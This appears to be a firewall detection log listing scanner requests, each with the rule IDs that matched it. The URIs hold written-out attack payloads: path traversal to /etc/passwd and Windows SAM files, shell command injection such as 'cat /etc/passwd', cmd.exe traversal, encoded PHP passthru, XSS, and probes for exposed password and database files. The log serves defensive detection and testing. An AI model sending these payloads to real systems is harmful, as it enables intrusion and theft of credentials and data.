Packet [1082]	Uri [/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1083]	Uri [/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1084]	Uri [//logSensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1085]	Uri [/logicworks.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1089]	Uri [//LOGSensePostNotThereNoNo.PWD]	Nattacks [1 ]	Signatures	[920440]
Packet [1090]	Uri [/LOGIN.PWD]	Nattacks [1 ]	Signatures	[920440]
Packet [1094]	Uri [/logs/strSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1095]	Uri [/logs/strSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1096]	Uri [/logs/str_err.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1097]	Uri [/logs/str_err.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1100]	Uri [/mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;]	Nattacks [1 ]	Signatures	[942511]
Packet [1101]	Uri [/mall_log_files/ordSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1102]	Uri [/mall_log_files/order.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1115]	Uri [/mcartfree/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1116]	Uri [/mcartfree/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1117]	Uri [/megabook/files/20/setSensePostNotThereNoNop.db]	Nattacks [1 ]	Signatures	[920440]
Packet [1118]	Uri [/megabook/files/20/setup.db]	Nattacks [1 ]	Signatures	[920440]
Packet [1121]	Uri [/members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22]	Nattacks [5 ]	Signatures	[932100]	[942110]	[942430]	[942431]	[942511]
Packet [1122]	Uri [/metacart/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1123]	Uri [/metacart/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1124]	Uri [//midSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1125]	Uri [/midicart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1126]	Uri [/MIDICART/midSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1127]	Uri [/MIDICART/midicart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1145]	Uri [/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1148]	Uri [/mpcsoftweb_guestbook/database/mpcSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1149]	Uri [/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1152]	Uri [/myinvoicer/config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1153]	Uri [/mylog.phtml?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1154]	Uri [/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent]	Nattacks [3 ]	Signatures	[941180]	[942431]	[942460]
Packet [1155]	Uri [/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=]	Nattacks [2 ]	Signatures	[942431]	[942460]
Packet [1156]	Uri [/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1163]	Uri [/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1164]	Uri [/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1165]	Uri [/news/newSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1166]	Uri [/news/news.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1167]	Uri [/newuser?Image=../../database/rbsserv.mdb]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1168]	Uri [/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1169]	Uri [/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1172]	Uri [/officescan/hotdownload/ofsSensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1173]	Uri [/officescan/hotdownload/ofscan.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1177]	Uri [/opendir.php?/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1178]	Uri [/opendir.php?requesturl=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1180]	Uri [/order/ordSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1181]	Uri [/order/order_log_v12.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1182]	Uri [/order/order_log.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1183]	Uri [/orders/ordSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1184]	Uri [/orders/order_log_v12.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1185]	Uri [/orders/order_log_v12.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1186]	Uri [/Orders/ordSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1187]	Uri [/Orders/order_log_v12.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1188]	Uri [/orders/order_log.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1189]	Uri [/Orders/order_log.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1190]	Uri [/Orders/order_log.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [1191]	Uri [/ows-bin/perlidlc.bat?&dir]	Nattacks [1 ]	Signatures	[920440]
Packet [1197]	Uri [/page.cgi?../../../../../../../../../../etc/passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930120]	[932160]
Packet [1198]	Uri [/page.cgi?../../../../../../../../../../etc/passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930120]	[932160]
Packet [1201]	Uri [/password.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1202]	Uri [/path/nw/article.php?id=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [1203]	Uri [/path/nw/article.php?id=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [1204]	Uri [/pccsmysqladm/incs/dbcSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1205]	Uri [/pccsmysqladm/incs/dbcSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1206]	Uri [/pccsmysqladm/incs/dbconnect.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1207]	Uri [/PDG_Cart/odeSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1208]	Uri [/PDG_Cart/oder.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1209]	Uri [/PDG_Cart/shopper.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [1212]	Uri [/perl/-e%20%22system('cat%20/etc/passwd');\%22]	Nattacks [1 ]	Signatures	[933160]
Packet [1229]	Uri [//phpSensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1230]	Uri [/php.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1235]	Uri [/php/mylog.phtml?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1251]	Uri [/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1254]	Uri [/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\]	Nattacks [1 ]	Signatures	[932110]
Packet [1255]	Uri [/phprocketaddin/?page=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1256]	Uri [/phprocketaddin/?page=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1257]	Uri [/phprocketaddin/?page=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1260]	Uri [/phptonuke.php?filnavn=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1261]	Uri [/phpwebfilemgr/index.php?f=../../../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1262]	Uri [/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1263]	Uri [/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [1265]	Uri [/pls/sample/admin_/help/..%255cplsql.conf]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1295]	Uri [/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1300]	Uri [//pwdSensePostNotThereNoNod.db]	Nattacks [1 ]	Signatures	[920440]
Packet [1301]	Uri [/pwd.db]	Nattacks [1 ]	Signatures	[920440]
Packet [1302]	Uri [//quiSensePostNotThereNoNo.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [1303]	Uri [/quikstore.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [1315]	Uri [/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1316]	Uri [/rtm.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1320]	Uri [/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1325]	Uri [/search.asp?term=<%00script>alert('Vulnerable')</script>]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[941100]	[941110]	[941160]	[942130]	[942370]	[942431]	[942460]	[942511]
Packet [1336]	Uri [/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=]	Nattacks [5 ]	Signatures	[942110]	[942200]	[942260]	[942430]	[942431]
Packet [1353]	Uri [/settings/site.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1354]	Uri [/shop/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1355]	Uri [/shop/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1356]	Uri [/shop/member_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [1357]	Uri [/shop/member_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [1358]	Uri [/shop/normal_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [1359]	Uri [/shop/normal_html.cgi?file=../../../../../../etc/issue%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1360]	Uri [/shop/normal_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [1361]	Uri [/shop/normal_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [1367]	Uri [/shoponline/fpdb/shoSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1368]	Uri [/shoponline/fpdb/shop.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1369]	Uri [/shoponline/fpdb/shop.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1370]	Uri [/shopping/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1371]	Uri [/shopping/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1374]	Uri [//shoSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1375]	Uri [//shoSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1376]	Uri [/shopping300.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1377]	Uri [/shopping400.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1378]	Uri [/shoppingdirectory/midSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1379]	Uri [/shoppingdirectory/midicart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1380]	Uri [/shoutbox.php?conf=../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1403]	Uri [//sqlSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1404]	Uri [/sqldump.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1405]	Uri [//sqlSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1406]	Uri [/sqlnet.log]	Nattacks [1 ]	Signatures	[920440]
Packet [1413]	Uri [//strSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1414]	Uri [/structure.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1415]	Uri [/structure.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1421]	Uri [/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1424]	Uri [/sysuser/docmgr/iecSensePostNotThereNoNo.stm/?template=..]	Nattacks [1 ]	Signatures	[930110]
Packet [1425]	Uri [/sysuser/docmgr/iecreate.stm?template=../]	Nattacks [1 ]	Signatures	[930110]
Packet [1426]	Uri [/sysuser/docmgr/ieeSensePostNotThereNoNo.stm/?url=..]	Nattacks [1 ]	Signatures	[930110]
Packet [1427]	Uri [/sysuser/docmgr/ieedit.stm?url=../]	Nattacks [1 ]	Signatures	[930110]
Packet [1448]	Uri [/typo3conf/datSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1449]	Uri [/typo3conf/database.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1455]	Uri [/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [1463]	Uri [/vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [1464]	Uri [/vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [1517]	Uri [/vgn/login/1,501,,00.html?cookieName=x--\>]	Nattacks [2 ]	Signatures	[941180]	[942460]
Packet [1551]	Uri [/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1552]	Uri [/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1553]	Uri [/viewpage.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1554]	Uri [/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [1555]	Uri [/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [1562]	Uri [/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1563]	Uri [/web-console/ServerInfo.jsp%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [1568]	Uri [/web.config]	Nattacks [2 ]	Signatures	[920440]	[930130]
Packet [1573]	Uri [/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1593]	Uri [/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1594]	Uri [/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [1600]	Uri [//ws_SensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1601]	Uri [/ws_ftp.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1602]	Uri [//WS_SensePostNotThereNoNo.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1603]	Uri [/WS_FTP.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1606]	Uri [/wx/s.dll?d=/boot.ini]	Nattacks [2 ]	Signatures	[920440]	[930120]
Packet [1609]	Uri [/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS]	Nattacks [1 ]	Signatures	[942260]
Packet [1611]	Uri [/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1613]	Uri [/file/../../../../../../../../etcSensePostNotThereNoNoetc/]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1614]	Uri [/file/../../../../../../../../etc/]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1640]	Uri [/_vti_bin/_vti_aut/autSensePostNotThereNoNo.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [1 ]	Signatures	[920440]
Packet [1641]	Uri [/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [1 ]	Signatures	[920440]
Packet [1642]	Uri [/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false]	Nattacks [1 ]	Signatures	[920440]
Packet [1645]	Uri [/_vti_bin/_vti_aut/dvwSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1646]	Uri [/_vti_bin/_vti_aut/dvwssr.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1647]	Uri [/_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx]	Nattacks [1 ]	Signatures	[920440]
Packet [1648]	Uri [/_vti_bin/_vti_aut/fp3SensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1649]	Uri [/_vti_bin/_vti_aut/fp30reg.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1652]	Uri [/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1653]	Uri [/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1672]	Uri [/_vti_bin/shtSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1673]	Uri [/_vti_bin/shtml.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1692]	Uri [/_vti_pvt/admSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1693]	Uri [/_vti_pvt/administrators.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1694]	Uri [/_vti_pvt/autSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1695]	Uri [/_vti_pvt/authors.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1700]	Uri [/_vti_pvt/serSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1701]	Uri [/_vti_pvt/serSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1702]	Uri [/_vti_pvt/service.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1706]	Uri [/_vti_pvt/useSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1707]	Uri [/_vti_pvt/useSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1708]	Uri [/_vti_pvt/users.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [1715]	Uri [/................../conSensePostNotThereNoNo.sys]	Nattacks [1 ]	Signatures	[920440]
Packet [1716]	Uri [/................../config.sys]	Nattacks [1 ]	Signatures	[920440]
Packet [1717]	Uri [/................../config.sys]	Nattacks [1 ]	Signatures	[920440]
Packet [1718]	Uri [/../../../../../../../../../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1719]	Uri [/../../../../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1720]	Uri [/../../../../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1721]	Uri [/..\\..\\..\\..\\..\\..\\..\\boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1723]	Uri [/%NETHOOD%/]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [1759]	Uri [/blahb.ida]	Nattacks [1 ]	Signatures	[920440]
Packet [1760]	Uri [/blahb.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [1762]	Uri [/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1763]	Uri [/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1764]	Uri [/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1765]	Uri [/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1766]	Uri [/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1783]	Uri [/cgi-bin/snoSensePostNotThereNoNo.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1784]	Uri [/cgi-bin/snorkerz.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1785]	Uri [/cgi-bin/snoSensePostNotThereNoNo.cmd]	Nattacks [1 ]	Signatures	[920440]
Packet [1786]	Uri [/cgi-bin/snorkerz.cmd]	Nattacks [1 ]	Signatures	[920440]
Packet [1787]	Uri [/cgi-dos/argSensePostNotThereNoNo.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1788]	Uri [/cgi-dos/args.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [1794]	Uri [/database/db2SensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1795]	Uri [/database/db2000.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1796]	Uri [/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=../../../../../../../../../win.ini&CiRestriction=none&CiHiliteType=Full]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1797]	Uri [/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=../../../../../../../../../win.ini&CiRestriction=none&CiHiliteType=Full]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1800]	Uri [/exchange/lib/AMPROPS.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1801]	Uri [/exchange/lib/ATTACH.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1802]	Uri [/exchange/lib/DELETE.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1803]	Uri [/exchange/lib/GETREND.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1804]	Uri [/exchange/lib/GETREND.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1805]	Uri [/exchange/lib/GETWHEN.INC]	Nattacks [1 ]	Signatures	[920440]
